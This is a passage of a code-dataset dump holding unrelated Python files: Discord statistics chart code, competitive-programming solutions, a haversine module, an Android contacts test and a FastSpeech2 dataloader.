connexion1,curseur1=connectSQL(ctx.guild.id,tempOption,\"Stats\",tableauMois[liste1[0]],liste1[1])\n connexion2,curseur2=connectSQL(ctx.guild.id,tempOption,\"Stats\",tableauMois[liste2[0]],liste2[1])\n table=curseur1.execute(\"SELECT * FROM {0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(liste1[0],liste1[1],obj)).fetchall()\n else:\n noms=[\"{0}/{1}\".format(liste1[0],liste1[1]),\"{0}/{1}\".format(liste2[0],liste2[1])]\n connexion1,curseur1=connectSQL(ctx.guild.id,option,\"Stats\",liste1[0],liste1[1])\n connexion2,curseur2=connectSQL(ctx.guild.id,option,\"Stats\",liste2[0],liste2[1])\n table=curseur1.execute(\"SELECT * FROM perso{0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(liste1[0],liste1[1],author)).fetchall()\n listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n pos=0\n setThemeGraph(plt)\n plt.subplots(figsize=(6.4,4.8))\n for i in range(len(table)):\n if option in (\"Messages\",\"Mots\",\"Voice\") or obj!=\"\":\n if guildOT.users[table[i][\"ID\"]][\"Hide\"]:\n continue\n elif option in (\"Salons\",\"Voicechan\"):\n if guildOT.chan[table[i][\"ID\"]][\"Hide\"]:\n continue\n center=0\n listeX.append(pos)\n listeY.append(table[i][\"Count\"])\n listeA.append(0)\n pos+=1\n center+=1\n\n if ligne[\"Commande\"]==\"compareServ\":\n count=curseur2.execute(\"SELECT * FROM {0}{1}{2} WHERE ID={3}\".format(liste2[0],liste2[1],obj,table[i][\"ID\"])).fetchone()\n else:\n count=curseur2.execute(\"SELECT * FROM perso{0}{1}{2} WHERE ID={3}\".format(liste2[0],liste2[1],author,table[i][\"ID\"])).fetchone()\n if count!=None:\n listeY.append(count[\"Count\"])\n listeA.append(1)\n listeX.append(pos)\n pos+=1\n center+=1\n\n listeSX.append(pos-center//2-1)\n try:\n nom=getNomGraph(ctx,bot,option,table[i][\"ID\"])\n if obj!=\"\" or option in (\"Messages\",\"Voice\",\"Mots\"):\n nom=nom.name\n if len(nom)>15:\n nom=nom[0:15]+\"...\"\n listeSN.append(nom)\n except:\n listeSN.append(\"??\")\n \n pos+=0.75\n\n voiceAxe(option,listeY,plt,\"y\")\n\n plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n plt.xticks(listeSX, listeSN,rotation=45)\n plt.xlabel(dictYAx[option])\n\n for i in range(len(listeY)):\n plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n plt.legend([matplotlib.patches.Patch(color=colors[0]),matplotlib.patches.Patch(color=colors[1])],[noms[0],noms[1]])\n\n plt.title(\"Groupement comparaison\\n{0}\".format(tempOption))\n plt.tight_layout()\n plt.savefig(\"Graphs/otGraph\")\n plt.clf()\n\n\ndef graphGroupedCompareRank(ligne,ctx,option,bot,guildOT):\n mois,annee=ligne[\"Args1\"],ligne[\"Args2\"]\n obj1,obj2=ligne[\"Args3\"],ligne[\"Args4\"]\n colors=[colorOT,\"green\"]\n noms=[getNomGraph(ctx,bot,option,int(obj1)),getNomGraph(ctx,bot,option,int(obj2))]\n\n connexion,curseur=connectSQL(ctx.guild.id,option,\"Stats\",tableauMois[mois],annee)\n table=curseur.execute(\"SELECT * FROM {0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(mois,annee,obj1)).fetchall()\n\n listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n pos=0\n setThemeGraph(plt)\n plt.subplots(figsize=(6.4,4.8))\n for i in range(len(table)):\n if guildOT.users[table[i][\"ID\"]][\"Hide\"]:\n continue\n center=0\n listeX.append(pos)\n listeY.append(table[i][\"Count\"])\n listeA.append(0)\n pos+=1\n center+=1\n\n count=curseur.execute(\"SELECT * FROM {0}{1}{2} WHERE ID={3}\".format(mois,annee,obj2,table[i][\"ID\"])).fetchone()\n if count!=None:\n listeY.append(count[\"Count\"])\n listeA.append(1)\n listeX.append(pos)\n pos+=1\n center+=1\n\n listeSX.append(pos-center//2-1)\n try:\n nom=getNomGraph(ctx,bot,\"Messages\",table[i][\"ID\"]).name\n if len(nom)>15:\n nom=nom[0:15]+\"...\"\n listeSN.append(nom)\n except:\n listeSN.append(\"??\")\n \n pos+=0.75\n\n voiceAxe(option,listeY,plt,\"y\")\n\n plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n plt.xticks(listeSX, listeSN,rotation=45)\n plt.xlabel(\"Membres\")\n\n for i in range(len(listeY)):\n plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n plt.legend([matplotlib.patches.Patch(color=colors[0]),matplotlib.patches.Patch(color=colors[1])],[noms[0],noms[1]])\n\n if table[0][\"Annee\"]==\"GL\":\n plt.title(\"Groupement comparaison\\n{0} - Période globale\".format(option)) \n else:\n plt.title(\"Groupement comparaison\\n{0} - {1} 20{2}\".format(option,tableauMois[table[0][\"Mois\"]],table[0][\"Annee\"])) \n\n plt.title(\"Groupement comparaison\\n{0}\".format(option))\n plt.tight_layout()\n plt.savefig(\"Graphs/otGraph\")\n plt.clf()","sub_path":"Stats/Graphiques/Compare/GroupedCompare.py","file_name":"GroupedCompare.py","file_ext":"py","file_size_in_byte":9453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"169499991","text":"# Problem [1181] : 단어 정렬\n\nn_val = int(input())\nwords = [list(input()) for _ in range(n_val)]\nresult = list()\nfor word in words:\n if word not in result:\n result.append(word)\n\nsorted_list = list(sorted(result,key = lambda x : (len(x),x)))\n\n\nfor word in sorted_list:\n print(''.join(map(str,word)))","sub_path":"Baekjoon/Sorting/BOJ_1181.py","file_name":"BOJ_1181.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399416931","text":"def solve(onum, num, st, tries):\n st = st | set(str(num))\n if len(st) == 10:\n return str(num)\n else:\n nnum = onum + num\n if nnum == num or tries == 100000000:\n return \"INSOMNIA\"\n return solve(onum, nnum,st,tries+1)\n\n\n\n\n\nf = open('input.txt', 'r')\no = open('output.txt', 'w')\nlines = f.readlines()\nT = int(lines[0])\nfor i in range(T):\n num = int(lines[i+1].strip())\n ans = \"Case #\" + str(i+1) + \": \" + solve(num,num,set(\"\"),0)\n o.write(ans + \"\\n\")\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_apr_sheep.py","file_name":"16_0_1_apr_sheep.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"552527991","text":"#!/usr/bin/env python\n# Copyright (c) 2014-2018 Michael Hirsch, Ph.D.\n#\n# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\ntry:\n from numpy import cos, arcsin, sqrt, radians, degrees\nexcept ImportError:\n from math import cos,sqrt,radians,degrees\n from math import asin as arcsin\ntry:\n from astropy.coordinates.angle_utilities import angular_separation\nexcept ImportError:\n angular_separation = None\n\"\"\"\nMichael Hirsch\n\nNote: adding decimal points to the constants made 0 difference in %timeit execution time\n\nThe Meeus algorithm is about 9.5% faster than Astropy/Vicenty on my PC,\nand gives virtually identical result\nwithin double precision arithmetic limitations\n\"\"\"\n\n\ndef anglesep_meeus(lon0, lat0, lon1, lat1, deg:bool=True):\n \"\"\"\n inputs: DEGREES (right ascension, declination Meeus p. 109)\n\n\n from \"Astronomical Algorithms\" by Jean Meeus Ch. 16 p. 111 (16.5)\n gives angular distance in degrees between two rightAscension,Declination\n points in the sky. Neglecting atmospheric effects, of course.\n\n Advantage of Meeus haversine method is stability all the way to exactly 0 deg.\n\n assumes degrees input, degrees output\n\n either the arrays must be the same size, or one of them must be a scalar\n \"\"\"\n\n if deg:\n lon0 = radians(lon0)\n lat0 = radians(lat0)\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n\n sep_rad = 2 * arcsin(sqrt( haversine(lat0 - lat1) +\n cos(lat0) * cos(lat1) * haversine(lon0 - lon1)))\n\n if deg:\n return degrees(sep_rad)\n else:\n return sep_rad\n\n\ndef anglesep(lon0, lat0, lon1, lat1, deg:bool=True):\n \"\"\"\n inputs: DEGREES\n\n For reference, this is from astropy astropy/coordinates/angle_utilities.py\n Angular separation between two points on a sphere.\n \"\"\"\n if angular_separation is None:\n raise ImportError('angledist requires AstroPy. Try pure Python angledis_meeus')\n\n if deg:\n lon0 = radians(lon0)\n lat0 = radians(lat0)\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n\n sep_rad = angular_separation(lon0,lat0, lon1, lat1)\n\n if deg:\n return degrees(sep_rad)\n else:\n return sep_rad\n\n\ndef haversine(theta):\n \"\"\"\n Compute haversine of angle theta (radians)\n\n http://en.wikipedia.org/wiki/Haversine\n Meeus p. 111\n \"\"\"\n return (1 - cos(theta)) / 2.\n","sub_path":"pymap3d/haversine.py","file_name":"haversine.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"256221844","text":"'''\n@author: wei,xiang\n'''\n\nimport fs_wrapper\nimport settings.common as SC\nfrom case_utility import *\nfrom logging_wrapper import log_test_case, save_fail_log, print_report_line\nfrom test_case_base import TestCaseBase\nfrom qrd_shared.case import *\nimport time\n\n\nclass test_suit_cmcc_devci_contact_case13(TestCaseBase):\n '''\n\n @see: L{TestCaseBase }\n '''\n \n \n def test_case_main(self, case_results):\n global case_flag , TAG, case_flag_add, case_flag_share_visible_contact\n case_flag = False\n case_flag_add = False\n case_flag_share_visible_contact = False\n TAG = \"Dev-ci cases: Contact \"\n log_test_framework(TAG, self.name + \" -Start\")\n \n \"\"\"\n cases contnets you need to add\n \"\"\"\n contact_list = [ ['phoneA', '10086'], ['phoneB', '10087'], ['phoneC', '10088']]\n \n start_activity('com.android.settings', '.Settings')\n settings.set_default_data(1)\n sleep(1)\n settings.set_default_sms(1)\n sleep(1)\n \n # launch contact\n start_activity(\"com.android.contacts\", \"com.android.contacts.activities.PeopleActivity\")\n sleep(1)\n contact.go_home()\n sleep(1) \n \n # click \"All contacts\" sheet to lock view\n click_textview_by_text(SC.PRIVATE_CONTACT_CONTACTS_OPTION, isScrollable=0)\n \n # we need to delete all contact \n contact.contact_to_display()\n local_assert(True, contact.del_all_contact(SC.PRIVATE_CONTACT_PHONE, SC.PRIVATE_CONTACT_SIM1, SC.PRIVATE_CONTACT_SIM2))\n \n log_test_framework(self.name, \"Now add new contact array saved into phone\")\n \n for i in range(0, len(contact_list)):\n scroll_to_top()\n click_imageview_by_desc('add new contact')\n # click_textview_by_id('account_type')\n #sleep(1)\n #click_textview_by_text('PHONE')\n sleep(1)\n contact.add_contact_into_phone(contact_list[i][0], contact_list[i][1])\n sleep(3)\n \n if search_text(contact_list[0][0]) and search_text(contact_list[1][0]) and search_text(contact_list[2][0]) :\n log_test_framework(self.name, \"Contact Array create successfully\")\n case_flag_add = True\n else:\n log_test_framework(self.name, \"Contact Array create failed\")\n case_flag_add = False\n take_screenshot()\n set_cannot_continue()\n \n if can_continue(): \n sleep(2)\n send_key(KEY_MENU)\n # click 'import/export' by index 2\n click_textview_by_text('Import/export', isScrollable=0)\n # click 'Share visible contacts' by index 5\n click_textview_by_index(5)\n sleep(1)\n send_key(KEY_MENU)\n click_textview_by_text('All')\n click_textview_by_desc('Done')\n sleep(2)\n scroll_to_bottom()\n if search_text('Messaging', isScrollable=1, searchFlag=TEXT_STARTS_WITH):\n scroll_to_bottom()\n log_test_framework(self.name, 'Frist time to use this function')\n click_textview_by_text('Messaging')\n click_textview_by_text('Just once')\n if search_text('Share with Messaging', isScrollable=0, searchFlag=TEXT_CONTAINS):\n log_test_framework(self.name, 'This function have been used')\n click_textview_by_text('Just once')\n # it will jump to Messager App\n if wait_for_fun(lambda:(search_view_by_id('send_button_mms')), True, 10) :\n log_test_framework(self.name, \"jump to messager successfully\")\n entertext_edittext_on_focused(SC.PUBLIC_SLOT2_PHONE_NUMBER)\n log_test_framework(self.name, \"Before Send time : \" + time.strftime(\"%I:%M:%S\"))\n click_imageview_by_id('send_button_mms')\n func = lambda:search_text('sent', searchFlag=TEXT_CONTAINS)\n if wait_for_fun(func, True, 30):\n log_test_framework(self.name, \"shared vcf sent successfully\")\n log_test_framework(self.name, \"Send out time : \" + time.strftime(\"%I:%M:%S\"))\n case_flag_share_visible_contact = True\n else:\n log_test_framework(self.name, \"shared vcf sent failed\")\n case_flag_share_visible_contact = False\n else:\n log_test_framework(self.name, \"jump to messager failed\")\n take_screenshot()\n set_cannot_continue()\n goback()\n sleep(5)\n \n case_flag = case_flag_add and case_flag_share_visible_contact\n \n \n if case_flag:\n qsst_log_case_status(STATUS_SUCCESS, \"\" , SEVERITY_HIGH)\n else:\n qsst_log_case_status(STATUS_FAILED, \"\", SEVERITY_HIGH)\n \n case_results.append((self.case_config_map[fs_wrapper.CASE_NAME_ATTR], case_flag))\n \n \n def test_case_end(self):\n '''\n record the case result\n\n '''\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ' : end')\n if can_continue() and case_flag == True:\n # shutdown()\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ': case pass')\n print_report_line(self.case_config_map[fs_wrapper.CASE_NAME_ATTR] + TAG + ' : \\tpass')\n else:\n log_test_case(self.case_config_map[fs_wrapper.CASE_NAME_ATTR], TAG + ' : case fail')\n print_report_line(self.case_config_map[fs_wrapper.CASE_NAME_ATTR] + TAG + ' : \\tfail')\n save_fail_log()\n \n","sub_path":"Source/QSST/Config/data/L/test_env/test_suit_cmcc_devci_contact/test_suit_cmcc_devci_contact_case13.py","file_name":"test_suit_cmcc_devci_contact_case13.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651606577","text":"from os import path\n\nimport argparse\nimport os\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument('src_dir', type=str)\nparser.add_argument('dst_dir', type=str)\nargs = parser.parse_args()\n\nif not path.exists(args.dst_dir):\n os.makedirs(args.dst_dir)\n\nlog_txt = 'treelog.txt'\nsrc_log = path.join(args.src_dir, log_txt)\ndst_log = path.join(args.dst_dir, log_txt)\nshutil.copyfile(src_log, dst_log)\n\nwith open(src_log, 'r') as fin:\n log = fin.read().strip()\n\nfor block in log.split('\\n\\n'):\n node_dir = 'Node_' + block.split('\\n')[0]\n src_node = path.join(args.src_dir, node_dir)\n dst_node = path.join(args.dst_dir, node_dir)\n if not path.exists(dst_node):\n os.makedirs(dst_node)\n\n att = 'fir.fs.fs.attr'\n shutil.copyfile(path.join(src_node, att), path.join(dst_node, att))\n\n core = 'core_features.txt'\n shutil.copyfile(path.join(src_node, core), path.join(dst_node, core))\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"firtree/ranker/arribada/init_firtree.py","file_name":"init_firtree.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"592036425","text":"# Copyright (c) 2021 Graphcore Ltd. All Rights Reserved.\n# Copyright 2020 Minh Nguyen (@dathudeptrai)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# This file has been modified by Graphcore Ltd.\n\"\"\"\nThe function `average_by_duration`and `_norm_mean_std` were copied from\nhttps://github.com/TensorSpeech/TensorFlowTTS/blob/v1.8/examples/fastspeech2/fastspeech2_dataset.py\n\"\"\"\nimport os\nimport json\nimport logging\nimport numpy as np\nimport tensorflow as tf\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s.%(msecs)06d: %(levelname)-1.1s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\n\n\ndef average_by_duration(x, durs):\n durs = durs.astype(np.int32)\n mel_len = durs.sum()\n durs_cum = np.cumsum(np.pad(durs, (1, 0))) # pad 0 to the start\n\n # calculate charactor f0/energy\n x_char = np.zeros((durs.shape[0],), dtype=np.float32)\n for idx, start, end in zip(range(mel_len), durs_cum[:-1], durs_cum[1:]):\n values = x[start:end][np.where(x[start:end] != 0.0)[0]]\n x_char[idx] = np.mean(values) if len(values) > 0 else 0.0\n return x_char.astype(np.float32)\n\n\nclass LJSpeechDataset(object):\n \"\"\"Dataloader for phoneme-level datasets.\"\"\"\n\n def __init__(self, opts, is_train=True):\n self.opts = opts\n self.is_train = is_train\n self.dtype = tf.float16 if opts[\"precision\"] == \"16\" else tf.float32\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n self.max_seq_len = opts[\"max_seq_length\"]\n self.max_mel_length = opts[\"max_wave_length\"]\n self.filenames = []\n if not self.opts[\"generated_data\"] and self.opts[\"data_path\"]:\n files_path = os.path.join(self.opts[\"data_path\"], \"train.txt\") if self.is_train else os.path.join(\n self.opts[\"data_path\"], \"val.txt\")\n with open(os.path.abspath(files_path)) as fp:\n for line in fp.readlines():\n self.filenames.append(line.strip())\n if is_train:\n np.random.shuffle(self.filenames)\n\n def __len__(self):\n if self.opts[\"generated_data\"]:\n return 10000\n return len(self.filenames)\n\n def _load_data(self, filename):\n phoneme = np.load(os.path.join(\n self.opts[\"data_path\"], \"phone\", f\"phn-{filename}.npy\")).astype(np.int32)\n duration = np.load(os.path.join(\n self.opts[\"data_path\"], \"duration\", f\"duration-{filename}.npy\")).astype(self.np_dtype)\n pitch = np.load(os.path.join(\n self.opts[\"data_path\"], \"pitch\", f\"pitch-{filename}.npy\")).astype(self.np_dtype)\n energy = np.load(os.path.join(\n self.opts[\"data_path\"], \"energy\", f\"energy-{filename}.npy\")).astype(self.np_dtype)\n mel = np.load(os.path.join(\n self.opts[\"data_path\"], \"mel\", f\"mel-{filename}.npy\")).astype(self.np_dtype)\n return phoneme, duration, pitch, energy, mel\n\n def _fake_duration(self, phn_len, mel_len):\n dur = [mel_len//phn_len]*phn_len\n balance = sum(dur) - mel_len\n dur[-1] += balance\n return np.array(dur).astype(np.int32)\n\n def _generated_generator(self):\n while True:\n phoneme = np.random.randint(0, self.max_seq_len,\n size=(self.max_seq_len,)).astype(np.int32)\n duration = self._fake_duration(\n self.max_seq_len, self.max_mel_length)\n mel = np.random.rand(self.max_mel_length, self.opts[\"num_mels\"]).astype(\n self.np_dtype)\n pitch = np.random.rand(self.max_seq_len,).astype(self.np_dtype)\n energy = np.random.rand(self.max_seq_len,).astype(self.np_dtype)\n\n yield phoneme, duration, pitch, energy, mel\n\n def _inference_generator(self):\n while True:\n for fn in self.filenames:\n phoneme = np.load(os.path.join(\n self.opts[\"data_path\"], \"phone\", f\"phn-{fn}.npy\")).astype(np.int32)\n yield phoneme\n\n def generator(self):\n while True:\n for fn in self.filenames:\n phoneme, duration, pitch, energy, mel = self._load_data(fn)\n yield phoneme, duration, pitch, energy, mel\n\n def __call__(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32, self.dtype, self.dtype,\n self.dtype, self.dtype)\n padded_shapes = ([self.max_seq_len], [self.max_seq_len], [self.max_seq_len], [\n self.max_seq_len], [self.max_mel_length, self.opts[\"num_mels\"]])\n\n if self.opts[\"generated_data\"]:\n data_gen = self._generated_generator\n else:\n if not self.filenames:\n self._shuffle_files()\n data_gen = self.generator\n\n datasets = tf.data.Dataset.from_generator(\n data_gen, output_types=output_types)\n if self.is_train:\n datasets = datasets.shuffle(\n buffer_size=1000, seed=int(self.opts[\"seed\"]))\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.map(lambda phoneme, duration, pitch, energy, melspectrum: (\n (phoneme, duration, pitch, energy), (melspectrum, melspectrum, duration, pitch, energy)))\n datasets = datasets.repeat().prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n def get_inference_data(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32)\n padded_shapes = ([self.max_seq_len])\n\n datasets = tf.data.Dataset.from_generator(\n self._inference_generator, output_types=output_types)\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.repeat(1).prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n\nclass LJSpeechCharLevelDataset(object):\n \"\"\"Dataloader for character-level datasets.\"\"\"\n\n def __init__(self, opts, is_train=True):\n self.opts = opts\n self.is_train = is_train\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n self.max_seq_length = opts[\"max_seq_length\"]\n self.max_mel_length = opts[\"max_wave_length\"]\n self.dtype = tf.float16 if opts[\"precision\"] == \"16\" else tf.float32\n self.np_dtype = np.float16 if opts[\"precision\"] == \"16\" else np.float32\n if not self.opts[\"generated_data\"] and self.opts[\"data_path\"]:\n self.utts_path = os.path.join(opts[\"data_path\"], \"train_utt_ids.npy\") if is_train else os.path.join(\n opts[\"data_path\"], \"valid_utt_ids.npy\")\n self.base_path = os.path.join(\n opts[\"data_path\"], \"train\") if is_train else os.path.join(opts[\"data_path\"], \"valid\")\n self.utts_ids = np.load(self.utts_path)\n # stats\n self.f0_stat = np.load(os.path.join(\n opts[\"data_path\"], \"stats_f0.npy\"))\n self.energy_stat = np.load(os.path.join(\n opts[\"data_path\"], \"stats_energy.npy\"))\n self.mel_stat = np.load(os.path.join(\n opts[\"data_path\"], \"stats.npy\"))\n self._set_path()\n self._get_length()\n self.same_sample = False\n\n def _set_path(self):\n self.duration_path = os.path.join(self.base_path, \"duration\")\n self.id_path = os.path.join(self.base_path, \"ids\")\n self.mel_path = os.path.join(self.base_path, \"norm-feats\")\n self.f0_path = os.path.join(self.base_path, \"raw-f0\")\n self.energy_path = os.path.join(self.base_path, \"raw-energies\")\n\n def _get_length(self):\n with open(os.path.join(self.opts[\"data_path\"], \"length.json\"), \"r\") as f:\n length = json.load(f)\n self.max_seq_length = length[\"max_seq_length\"]\n self.max_mel_length = length[\"max_mel_length\"]\n\n def __len__(self):\n return len(self.utts_ids)\n\n def _load_data(self, utt_id):\n input_id = np.load(os.path.join(\n self.id_path, f\"{utt_id}-ids.npy\")).astype(np.int32)\n f0 = np.load(os.path.join(\n self.f0_path, f\"{utt_id}-raw-f0.npy\")).astype(self.np_dtype)\n energy = np.load(os.path.join(self.energy_path,\n f\"{utt_id}-raw-energy.npy\")).astype(self.np_dtype)\n duration = np.load(os.path.join(self.duration_path,\n f\"{utt_id}-durations.npy\")).astype(self.np_dtype)\n mel = np.load(os.path.join(\n self.mel_path, f\"{utt_id}-norm-feats.npy\")).astype(self.np_dtype)\n\n assert len(f0) == len(energy) == mel.shape[0], \\\n f\"[{utt_id}]Shape mismatch!(f0({f0.shape}), energy({energy.shape}) and mel({mel.shape[0]})\"\n assert sum(duration) == mel.shape[0], \\\n f\"[{utt_id}]Sum of duration({sum(duration)}) is not equal to mel.shape[0]({mel.shape[0]}).\"\n\n f0 = self._norm_mean_std(f0, self.f0_stat[0], self.f0_stat[1])\n energy = self._norm_mean_std(\n energy, self.energy_stat[0], self.energy_stat[1]\n )\n\n # calculate charactor f0/energy\n f0 = average_by_duration(f0, duration)\n energy = average_by_duration(energy, duration)\n return input_id, duration, f0, energy, mel\n\n def _norm_mean_std(self, x, mean, std):\n zero_idxs = np.where(x == 0.0)[0]\n x = (x - mean) / std\n x[zero_idxs] = 0.0\n return x\n\n def _fake_duration(self, phn_len, mel_len):\n # duration will be padded during loading.\n dur = [mel_len//phn_len]*(phn_len-1)\n balance = sum(dur) - mel_len\n dur[-1] += balance\n return np.array(dur).astype(np.int32)\n\n def _generated_generator(self):\n while True:\n input_id = np.random.randint(0, self.max_seq_length,\n size=(self.max_seq_length,)).astype(np.int32)\n duration = self._fake_duration(\n self.max_seq_length, self.max_mel_length)\n mel = np.random.rand(self.max_mel_length,\n self.opts[\"num_mels\"]).astype(self.np_dtype)\n f0 = np.random.rand(self.max_seq_length,).astype(self.np_dtype)\n energy = np.random.rand(self.max_seq_length,).astype(self.np_dtype)\n yield input_id, duration, f0, energy, mel\n\n def _inference_generator(self):\n for utt_id in self.utts_ids:\n input_id = np.load(os.path.join(\n self.id_path, f\"{utt_id}-ids.npy\")).astype(np.int32)\n yield input_id\n\n def generator(self):\n if self.same_sample:\n uid = self.utts_ids[0]\n input_id, duration, f0, energy, mel = self._load_data(uid)\n while True:\n logger.info(\n f\"[Same samples({uid})]uid={uid}, id_gt.shape={input_id.shape}, duration_gt.shape={duration.shape}, f0_gt.shape={f0.shape}, mel_gt.shape={mel.shape}, sum_duration={np.sum(duration)}\")\n yield input_id, duration, f0, energy, mel\n else:\n while True:\n for uid in self.utts_ids:\n try:\n input_id, duration, f0, energy, mel = self._load_data(\n uid)\n yield input_id, duration, f0, energy, mel\n except AssertionError:\n pass\n\n def get_one_samples(self):\n uid = np.random.choice(self.utts_ids)\n input_id, duration, f0, energy, mel = self._load_data(uid)\n return uid, input_id, duration, f0, energy, mel\n\n def get_inference_data(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32)\n padded_shapes = ([self.max_seq_length])\n\n datasets = tf.data.Dataset.from_generator(\n self._inference_generator, output_types=output_types)\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n datasets = datasets.repeat(1).prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n def __call__(self):\n \"\"\"Create tf.dataset function.\"\"\"\n tf.random.set_seed(int(self.opts['seed']))\n np.random.seed(int(self.opts['seed']))\n\n output_types = (tf.int32, self.dtype, self.dtype,\n self.dtype, self.dtype)\n padded_shapes = ([self.max_seq_length], [self.max_seq_length], [self.max_seq_length], [\n self.max_seq_length], [self.max_mel_length, self.opts[\"num_mels\"]])\n\n if self.opts[\"generated_data\"] or not self.opts[\"data_path\"]:\n data_gen = self._generated_generator\n else:\n data_gen = self.generator\n\n datasets = tf.data.Dataset.from_generator(\n data_gen, output_types=output_types)\n if self.is_train:\n datasets = datasets.shuffle(\n buffer_size=1000, seed=int(self.opts[\"seed\"]))\n datasets = datasets.padded_batch(\n self.opts[\"batch_size\"], padded_shapes=padded_shapes, drop_remainder=True)\n\n datasets = datasets.map(lambda input_id, duration, pitch, energy, melspectrum: (\n (input_id, duration, pitch, energy), (melspectrum, melspectrum, duration, pitch, energy)))\n\n datasets = datasets.repeat().prefetch(tf.data.experimental.AUTOTUNE)\n return datasets\n\n\nif __name__ == \"__main__\":\n from options import make_global_options\n opts = make_global_options([])\n train_datasets = LJSpeechCharLevelDataset(opts, is_train=True)\n val_datasets = LJSpeechCharLevelDataset(opts, is_train=False)\n print(\n f\"Train datasets: {len(train_datasets)}, Valid datasets: {len(val_datasets)}\")\n traindata = train_datasets()\n valdata = val_datasets()\n (input_id, duration, f0, energy, mel), y = next(iter(traindata))\n print(\"******* Train datasets:\")\n print(f\"input_id: shape={input_id.shape}, dtype={input_id.dtype}\")\n print(f\"duration: shape={duration.shape}, dtype={duration.dtype}\")\n print(f\"f0: shape={f0.shape}, dtype={f0.dtype}\")\n print(f\"energy: shape={energy.shape}, dtype={energy.dtype}\")\n print(f\"mel: shape={mel.shape}, dtype={mel.dtype}\")\n","sub_path":"applications/tensorflow2/fastspeech2/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":15103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"28637447","text":"# 81で作成したコーパス中に出現するすべての単語tに関して,単語tと文脈語cのペアをタブ区切り形式ですべて書き出せ.ただし,文脈語の定義は次の通りとする.\n\n# 